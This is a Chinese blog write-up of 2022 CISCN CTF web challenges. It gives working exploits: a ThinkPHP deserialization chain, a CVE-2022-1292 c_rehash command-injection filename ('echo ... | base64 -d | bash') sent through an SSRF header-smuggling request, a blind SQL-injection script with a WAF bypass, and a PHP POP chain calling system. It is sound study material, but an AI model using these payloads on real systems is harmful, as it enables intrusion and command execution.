[2022 CISCN]初赛 web题目复现

最新推荐文章于 2024-05-20 12:51:19 发布
最新推荐文章于 2024-05-20 12:51:19 发布
阅读量4k 收藏 6
点赞数 9
分类专栏: 刷题记录 文章标签: 前端 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/125598409
版权

ezpop

源码泄露www.zip,用网上的链子直接打

<?php

namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag.txt"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(serialize($b));

online_crt

考点:

CVE-2022-1292

SSRF

项目分析

项目后端为python+go,其中python部署在外网,go通过python转发到内网

先看python,一共有四个路由:

  • /为主界面

  • /getcrt生成一个x509证书

  • /createlink调用c_rehash创建证书链接

  • /proxy通过代理访问go内网服务

image-20220702135500941

再来看go,有一个admin路由,用以重命名证书文件

image-20220702135633631

解题

题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞

c_rehash是openssl中的一个用perl编写的脚本工具,用于批量创建证书等文件 hash命名的符号链接

我们看到漏洞的commit:

https://github.com/openssl/openssl/commit/7c33270707b568c524a8ef125fe611a8872cb5e8?diff=split

image-20220702142413801

这里没有过滤反引号就直接将文件名拼接到了命令中,那么我们在文件名中添加反引号即可执行任意命令

向上追溯可以发现:

image-20220702143311371

在执行命令前函数会检查文件后缀名.(pem)|(crt)|(cer)|(crl) 和文件内容
文件内容必须包含证书或者是吊销列表才能通过检查

漏洞利用条件
  • 执行c_rehash的目标目录文件可控
  • 文件后缀符合要求
  • 文件内容必须包含证书或者吊销列表
  • 文件名可控

题目中生成证书功能可以创建一个满足要求的文件,那么我们还需要对文件名进行修改

看到内网go部分:

为了实现可控的文件名,我们需要调用go的重命名功能,go的路由在重命名前有两个校验c.Request.URL.RawPath != "" && c.Request.Host == "admin"

我们需要绕过这两个验证

url注入http头

Request.Host为请求的host头,在python中请求包中host头是固定的(test_host_api),这里我们需要想办法让go后端认为host值为admin

python在代理请求时直接使用了socket发送raw数据包,在数据包{uri}处没有过滤,所以我们可以在uri注入一个host头来替换原本的头,注入之后数据包变成:

GET / HTTP /1.1
Host: admin
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


HTTP /1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

这样就可以绕过host头检验

go的RawPath特性

对于Request.URL.RawPath检验,我们通过阅读go net库的源码,发现go语言中会对原始url进行解码(反转义),如果解码后再编码的url和原始url不同,那么RawPath会被设置为原始url,反之会被设置为空

image-20220703234004573

也就是说为了避免RawPath被置空,我们只需将url中任意一个/进行url编码即可

整体流程

  • 访问 /getcrt 路由 生成一个证书 返回证书路径

    static/crt/62a5726a-352a-4538-b236-1972b59ccf1e.crt

    image-20220703234732211

  • 请求 /proxy 修改证书名为恶意文件名

    这一步需要构造HTTP包注入多个HTTP连接来改HOST并且URL里面有个/要改成%2f绕过检查访问重命名接口

    利用CVE构造命令注入Payloadm,发包改名

    `echo "Y2F0IC9mbGFnID4gZmxhZw==" | base64 -d | bash`.crt

    发包:

    GET /proxy HTTP/1.1
Host: 1.14.71.254:28536
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5FhbXcy21j5NxtoY
Content-Length: 478

------WebKitFormBoundary5FhbXcy21j5NxtoY
Content-Disposition: form-data; name="uri"

/ HTTP/1.1
Host: admin
Connection: keep-alive

GET /admin%2frename?oldname=62a5726a-352a-4538-b236-1972b59ccf1e.crt&newname=%60%65%63%68%6f%20%22%59%32%46%30%49%43%39%6d%62%47%46%6e%49%44%34%67%5a%6d%78%68%5a%77%3d%3d%22%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%60%2e%63%72%74 HTTP/1.1
Host: admin
Connection: close

GET /
------WebKitFormBoundary5FhbXcy21j5NxtoY--

    image-20220703235322616

  • 访问createlink接口,触发命令注入,将flag写入static/crt/flag

    image-20220703235420028

  • 最后访问即可

ezpentest

SQL注入

首先进入题目是一个登录框

image-20220704001728428

题目给出了waf:

<?php
function safe($a) {
    $r = preg_replace('/[\s,()#;*~\-]/','',$a);
    $r = preg_replace('/^.*(?=union|binary|regexp|rlike).*$/i','',$r);
    return (string)$r;
  }
?>

这一部分内容和虎符杯类似,我们构造payload

0'||case'1'when`password`collate'utf8mb4_bin'like'{}%'then+9223372036854775807+1+''else'0'end||'

简单分析一下:

  • 利用like去正则匹配password这一列的数据,如果匹配到就返回9223372036854775807+1 这个表达式,而这个表示执行后会导致数据溢出,服务器会报500,否则就返回’0’,服务器会报error

  • +''是因为过滤了空白符号,所以用来连接起sql语句的,这里的数据溢出同样可以用18446744073709551615+1,这个18446744073709551615的值其实就是~0,也就是说这个payload其实就是~0+1

  • utf8mb4_bin是用来区分大小写的,因为like正则匹配是不区分大小写的

  • case用来解决优先级问题

所以构造脚本:

import requests
import string
payload="0'||case'1'when`username`collate'utf8mb4_bin'like'{}%'then+9223372036854775807+1+''else'0'end||'"
#这里过滤了取反,所以要用9223372036854775807+1这个也可以18446744073709551615+1来代替溢出
list = string.ascii_letters + string.digits + '^$!_%@&'

proxies={
    'http':'http://127.0.0.1:8080'
}	#这里是可以通过走代理来看下自己打进去的payload有没有啥问题。
url = 'http://1.14.71.254:28706/login.php'
j=''
while 1:
    for i in list:
        if (i in '%_'):  #这里是对like正则匹配中的一些特殊符号进行转义,这里很重要,不然注出来的结果都不行。
            i = "\\" + i
        now_payload=payload.format(j+i)
        date={
        'password': now_payload,
        'username': 'aaa'
        }
        print(now_payload)
        re = requests.post(url,data=date)

        print(re.text)
        if  re.status_code==500:

            print("ok")
            j+=i
            print(j)
            break

# 最后得到的账号密码
# nssctfwabbybaboo!@$%!!
# PAssw40d_Y0u3_Never_Konwn!@!!

解混淆

登陆后发现混淆代码,提示有一个1Nd3x_Y0u_N3v3R_Kn0W.php

image-20220704120233347

直接访问得到SomeClass.php的内容

<?php
class A
{
    public $a;
    public $b;
    public function see()
    {
        $b = $this->b;
        $checker = new ReflectionClass(get_class($b));
        if(basename($checker->getFileName()) != 'SomeClass.php'){
            if(isset($b->a)&&isset($b->b)){
                ($b->a)($b->b."");
            }
        }
    }
}
class B
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->see();
        return "1";
    }
}
class C
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->read();
        return "lock lock read!";
    }
}
class D
{
    public $a;
    public $b;
    public function read()
    {
        $this->b->learn();
    }
}
class E
{
    public $a;
    public $b;
    public function __invoke()
    {
        $this->a = $this->b." Powered by PHP";
    }
    public function __destruct(){
        //eval($this->a); ??? 吓得我赶紧把后门注释了
        //echo "???";
        die($this->a);
    }
}
class F
{
    public $a;
    public $b;
    public function __call($t1,$t2)
    {
        $s1 = $this->b;
        $s1();
    }
}

?>

而主页面本身是一段混淆之后的代码,查看源码发现是由phpjiami进行混淆的

https://github.com/wenshui2008/phpjiami_decode

由于phpjiami解密相对比较苛刻,少一个字符都会解密失败,可以采用脚本把混淆代码保存下来再解密

<?php
$url ="http://1.14.71.254:28706/login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt ($ch, CURLOPT_COOKIE, "PHPSESSID=00110b2656dbd4b5dd347f793e516da1");
$result = curl_exec($ch);
curl_close($ch);
echo urlencode($result);
file_put_contents("pop.php",$result);
?>

解密之后的文件为:

<?php
session_start();
if(!isset($_SESSION['login'])){
    die();
}
function Al($classname){
    include $classname.".php";
}

if(isset($_REQUEST['a'])){
    $c = $_REQUEST['a'];
    $o = unserialize($c);
    if($o === false) {
        die("Error Format");
    }else{
        spl_autoload_register('Al');
        $o = unserialize($c);
        $raw = serialize($o);
        if(preg_match("/Some/i",$raw)){
            throw new Error("Error");
        }
        $o = unserialize($raw);
        var_dump($o);
    }
}else {
    echo file_get_contents("SomeClass.php");
}

POP链构造

入口点在class E,die方法中是字符串处理,让a为对象会触发__toString方法

image-20220704121614771

接下来触发顺序为

B::__toString->a::see

image-20220704122417729

在类A中,我们只需要令b为原生类,a参数和b参数都是可控的就可以rce了

链子的触发点就是1Nd3x_Y0u_N3v3R_Kn0W.php文件,但是如果我们想把可以rce的文件包含进来,就要创建一个SomeClass类,而这里对some进行了过滤。

我们只需要让include $classname.".php"将文件包含的同时直接进入那个destrust方法销毁,这里可以利用gc回收机制。我们将数组索引置为0,这样就会失去上一个对象的引用从而进入destrust。

还有一种方法可以提前进入destrust,利用fastdestrust,传一个损坏的序列化数据,比如O:6:"person":3:{s:4:"name";N;s:3:"age";i:19;s:3:"sex";N;,把后面 }的符号去掉就行,但是这里有对序列化数据格式正确与否进行校验所以无法使用。

POC:

<?php

class A
{
    public $a;
    public $b;
    public function see()
    {
        $b = $this->b;
        $checker = new ReflectionClass(get_class($b));
        if(basename($checker->getFileName()) != 'SomeClass.php'){
            if(isset($b->a)&&isset($b->b)){
                ($b->a)($b->b."");
            }
        }
    }
}
class B
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->see();
        return "1";
    }
}
class C
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->read();
        return "lock lock read!";
    }
}
class D
{
    public $a;
    public $b;
    public function read()
    {
        $this->b->learn();
    }
}
class E
{
    public $a;
    public $b;
    public function __invoke()
    {
        $this->a = $this->b." Powered by PHP";
    }
    public function __destruct(){
        die($this->a);
    }
}
class F
{
    public $a;
    public $b;
    public function __call($t1,$t2)
    {
        $s1 = $this->b;
        $s1();
    }
}

class SomeClass{
    public $a;
}

$e = new E();
$a = new A();
$b = new B();

$e->a = $b;
$b->a = $a;
$arr = new ArrayObject();//换其他原生类都行error啥的都可以
$arr->a = "system";
$arr->b = "cat /nssctfflag";
$a->b = $arr;
$c = new SomeClass();
$c->a = $e;
echo urlencode(str_replace("i:1;", "i:0;", serialize(array($c,1))));

得到flag:

image-20220704133253136

cmdbrowser

暂无复现途径

参考:

https://mp.weixin.qq.com/s/vTF9ArXKp4RCFQPl6mOGkA

https://rce.moe/archives/

Snakin_ya
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
OpenSSL 远程代码执行漏洞 CVE-2022-1292 升级方案及步骤
Bertram的博客
08-30 612
OpenSSL 远程代码执行漏洞 CVE-2022-1292 升级方案及步骤
2022CSP-J初赛真题
08-03
"2022CSP-J初赛真题" 本资源为2022年CCF CSP-J初赛真题,考试时间为2022年9月18日9:30-11:30,考试共计100分,考生须在答题纸上作答,不得使用电子设备或查阅书籍资料。 单项选择题中,考题涵盖了C++语言的面向...
OpenSSL命令注入漏洞 (CVE-2022-1292
m0_55641973的博客
06-13 5389
1. c_rehash是openssl中的一个用perl编写的脚本工具,c_rehash 为文件创建一个符号连接,并将此符号连接的名称设为文件的。语法:c_rehash [-old] [-h] [-n] [-v] [ directory... ]openssl 是目前最流行的 SSL 密码库工具,其提供了一个通用、健壮、功能完备的工具套件.-v:打印移除的老式连接和新创建的连接的信息。-old:使用1.0.0版本之前的老式hash(MD5,而不是SHA-1)去生成连接。,则默认的目录由安装时的信息指定。
第十七届全国大学生信息安全竞赛创新实践能力赛初赛CISCN-2024部分WP)
Welcome To Myon'Blog !
05-20 2112
给的 e 其实就是 d,只是结果是移位后的输出,n 很大无法分解,但 kk 与 rr 很小,由 rr= e//n 即可推出 rr 和 kk,又由 e + x + kk*p + rr*((p+1)* (q+1))+ 1 = 65537,将 × 设为 0 和 2^200 然后联立求解一元二次方程,就能求出 p, q 的上下界,这样就有p 和q 的高位,枚举未知位尝试coppersmith 直到分解出结果,最后代入求 e 和 d,进而求得flag。
MySQL Server  CVE-2022-1292 高危漏洞
热门推荐
黑帽子技术的博客
08-03 1万+
MySQL Server CVE-2022-1292 高危漏洞 漏洞说明: https://www.oracle.com/security-alerts/c...
CVE-2022-1292漏洞修复
计算机辅助工程
08-11 2968
cve-2022-1292漏洞修复
openssl 漏洞升级 (CVE-2015-4000/CVE-2022-1292
qq_44637753的博客
09-13 2141
openssl 升级(SSL/TLS LogJam中间人安全限制绕过漏洞 (CVE-2015-4000))
[2022CISCN]online_crt(ssrf+OpenSSL)CVE-2022-1292
Landasika的博客
06-01 7605
修改main.go 将 改成 运行main.go python环境 修改app.py 因为大多数c_rehash指代的不是题目给的这个包,而是其他程序卸载环境变量里面的c_rehash,如下图所以我们打开把这个 改成 移动c_rehash 将goland_server里面的c_rehash移动到上一级目录,也就是和app.py一级 题解 分析 首先,题目是python+go /getcrt 是生成了一个SSL证书利用x509编码/createlink调用c_rehash修改文件名创建SSL证书链接/pox
2019-2022 csp初赛试题
11-24
本压缩包文件包含2019年至2022年CSP初赛的历年真题,对于备考者来说,是极有价值的参考资料。 一、CSP认证简介 CSP认证分为入门级和提高级两个级别,分别对应初级和高级的编程能力测试。考试内容涵盖算法设计、数据...
csp-J2022初赛答案
10-02
csp-J2022初赛答案 适用于全国的oiers 在重做之后自测
信息学奥赛2022初赛真题
最新发布
05-30
《信息学奥赛2022初赛真题》是一个针对教育和考试领域的资源集合,主要包含历年信息学奥林匹克竞赛的初赛试题。这个压缩包文件提供了三套完整的试卷(卷1、卷2、卷3)以及对应的答案,旨在帮助参赛者熟悉比赛格式,...
初赛题目.zip
11-07
本案例中的"初赛题目.zip"显然是一场竞赛的初步任务说明或相关资料。虽然没有提供具体的标签,我们可以根据常见的压缩包文件内容来推测可能包含的知识点。 1. 压缩技术:ZIP是一种广泛使用的文件格式,用于压缩多个...
安全狗高危安全通告】OpenSSL存在远程代码执行漏洞和拒绝服务漏洞
bocco的博客
05-17 1548
近日,安全狗应急响应中心监测到,OpenSSL官方发布安全公告,漏洞编号为CVE-2022-1292CVE-2022-1473。攻击者可远程利用这两个漏洞造成代码执行和拒绝服务。
php的控制反转和依赖注入
sinat_38804294的博客
07-04 435
1.判断代码的好处就是高内聚低耦合 高内聚就是软件模块是由相关性很强的代码组成,只负责一项任务,也就是常说的单一责任原则。 低耦合就是每个模块之间耦合度要低,如果要修改,修改一点点就可以而不是修改一大部分。 而在代码中体现出来的设计模式就是依赖注入和控制反转 2.依赖注入: 就是A类所依赖的B类C类等以属性或者构造函数等方式注入A类而不是直接在A类中实例化。 例如: class A { p...
buu(rce命令执行)
qq_62046696的博客
09-02 370
-oG h.php 忘记了php被过滤,后缀也一样,用phtml代替127.0.0.1
2022安洵杯babyphp
东隅的博客
11-28 1059
这个题没打出来有点可惜,感觉做的都差不多了,不过有些地方确实没理解,还是理解不到位先来看序列化,这个序列化是不难的,不过有一个小坑,我们先理一遍顺序flag.php这里最后肯定要调用C类的uwant函数,可以由A类的__invoke()方法触发,A类的__invoke()方法由C类的__toString()方法触发,这里有一个小坑,我当时一直以为这个tostring是A类的 $this->a = "babyhacker";触发的,结果一直没跑通,后来看没用到B类,尝试用B的die($this->a);
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1225
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值